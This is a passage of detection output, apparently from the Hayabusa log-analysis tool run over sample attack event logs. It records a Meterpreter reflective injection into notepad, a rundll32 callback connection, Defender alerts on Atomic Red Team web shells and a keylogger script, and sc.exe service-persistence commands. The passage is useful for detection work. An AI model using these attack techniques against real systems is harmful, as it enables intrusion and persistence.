Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.145 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.160 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.160 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.160 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.160 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.176 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.176 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.176 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.176 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.192 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.192 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.192 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.192 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.207 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.207 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.207 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.207 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.223 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.223 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.223 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.223 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.239 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.239 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.239 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.239 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.254 +00:00,IEWIN7,1,info,,Process Created,"Cmd: rundll32.exe | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\notepad.exe"" | LID: 0x135ca | PID: 2328 | PGUID: 365ABB72-1282-5D1D-0000-0010DD401B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.254 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.254 +00:00,IEWIN7,10,low,,Process Access,Src Process: C:\Windows\system32\notepad.exe | Tgt Process: C:\Windows\system32\rundll32.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1632 | Src PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00 | Tgt PID: 2328 | Tgt PGUID: 365ABB72-1282-5D1D-0000-0010DD401B00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.254 +00:00,IEWIN7,1,high,LatMov | Exec,Rundll32 Without 
Parameters,,rules/sigma/process_creation_sysmon/proc_creation_win_rundll32_without_parameters.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.254 +00:00,IEWIN7,1,high,,Application Executed Non-Executable Extension,,rules/sigma/process_creation_sysmon/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.254 +00:00,IEWIN7,1,high,,Suspicious Process Parents,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_parents.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.254 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.254 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.254 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.254 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:31.707 +00:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.13:49159 (IEWIN7) | Dst: 10.0.2.18:8181 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\rundll32.exe | PID: 2328 | PGUID: 365ABB72-1282-5D1D-0000-0010DD401B00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-18 20:40:00.730 +00:00,MSEDGEWIN10,1116,high,,Windows Defender Alert,Threat: Trojan:PowerShell/Powersploit.M | Severity: Severe | Type: Trojan | User: MSEDGEWIN10\IEUser | Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1 | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-18 20:40:16.396 +00:00,MSEDGEWIN10,1116,high,,Windows Defender Alert,Threat: Trojan:XML/Exeselrun.gen!A | Severity: Severe | Type: Trojan | User: MSEDGEWIN10\IEUser | Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1086\payloads\test.xsl | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-18 20:41:16.418 +00:00,MSEDGEWIN10,1116,high,,Windows 
Defender Alert,Threat: HackTool:JS/Jsprat | Severity: High | Type: Tool | User: MSEDGEWIN10\IEUser | Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005) | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-18 20:41:17.508 +00:00,MSEDGEWIN10,1116,high,,Windows Defender Alert,Threat: Backdoor:ASP/Ace.T | Severity: Severe | Type: Backdoor | User: MSEDGEWIN10\IEUser | Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\cmd.aspx | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-18 20:41:48.236 +00:00,MSEDGEWIN10,1116,high,,Windows Defender Alert,Threat: Trojan:Win32/Sehyioa.A!cl | Severity: Severe | Type: Trojan | User: MSEDGEWIN10\IEUser | Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1218\src\Win32\T1218-2.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-18 20:51:50.798 +00:00,MSEDGEWIN10,1116,high,,Windows Defender Alert,Threat: HackTool:JS/Jsprat | Severity: High | Type: Tool | User: MSEDGEWIN10\IEUser | Path: containerfile:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp; file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0037); 
file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0045); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0065); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0068) | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx +2019-07-19 14:42:51.446 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 4516 288 0000023C0CA21C70 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 5828 | PGUID: 747F3D96-D6EB-5D31-0000-0010E0252500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:42:53.295 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x50951 | PID: 3764 | PGUID: 747F3D96-D6ED-5D31-0000-0010C88A2500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:43:03.303 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: powershell | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x50951 | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:43:03.303 +00:00,MSEDGEWIN10,1,low,Exec,Non Interactive 
PowerShell,,rules/sigma/process_creation_sysmon/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:43:46.623 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\phvj2yfb\phvj2yfb.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:44:08.161 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4216 | PGUID: 747F3D96-D738-5D31-0000-001046A02600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:44:08.185 +00:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence or Exec - Services Management | Cmd: sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe | Process: C:\Windows\System32\sc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe"" | LID: 0x50951 | PID: 1700 | PGUID: 747F3D96-D738-5D31-0000-001098A22600 | Hash: 
SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:44:08.185 +00:00,MSEDGEWIN10,1,low,Persis | PrivEsc,New Service Creation,,rules/sigma/process_creation_sysmon/proc_creation_win_new_service_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:44:08.268 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe start AtomicTestService"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2556 | PGUID: 747F3D96-D738-5D31-0000-001056A62600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:44:08.288 +00:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence or Exec - Services Management | Cmd: sc.exe start AtomicTestService | Process: C:\Windows\System32\sc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe start AtomicTestService"" | LID: 0x50951 | PID: 4260 | PGUID: 747F3D96-D738-5D31-0000-0010D8AA2600 | Hash: SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:44:08.307 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe | Process: 
C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 6188 | PGUID: 747F3D96-D738-5D31-0000-00105CAC2600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:44:09.150 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe stop AtomicTestService"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5000 | PGUID: 747F3D96-D739-5D31-0000-00104CB72600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:44:09.176 +00:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence or Exec - Services Management | Cmd: sc.exe stop AtomicTestService | Process: C:\Windows\System32\sc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe stop AtomicTestService"" | LID: 0x50951 | PID: 980 | PGUID: 747F3D96-D739-5D31-0000-0010B6B92600 | Hash: SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:44:09.176 +00:00,MSEDGEWIN10,1,low,Impact,Stop Windows Service,,rules/sigma/process_creation_sysmon/proc_creation_win_service_stop.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:44:09.253 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe delete AtomicTestService"" | Process: 
C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4744 | PGUID: 747F3D96-D739-5D31-0000-0010E4BB2600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:44:09.278 +00:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence or Exec - Services Management | Cmd: sc.exe delete AtomicTestService | Process: C:\Windows\System32\sc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe delete AtomicTestService"" | LID: 0x50951 | PID: 2884 | PGUID: 747F3D96-D739-5D31-0000-001046BE2600 | Hash: SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:44:09.351 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6896 | PGUID: 747F3D96-D739-5D31-0000-0010B2C22600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:44:32.101 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe | Process: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 5348 | PGUID: 747F3D96-D750-5D31-0000-0010B9F82600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 
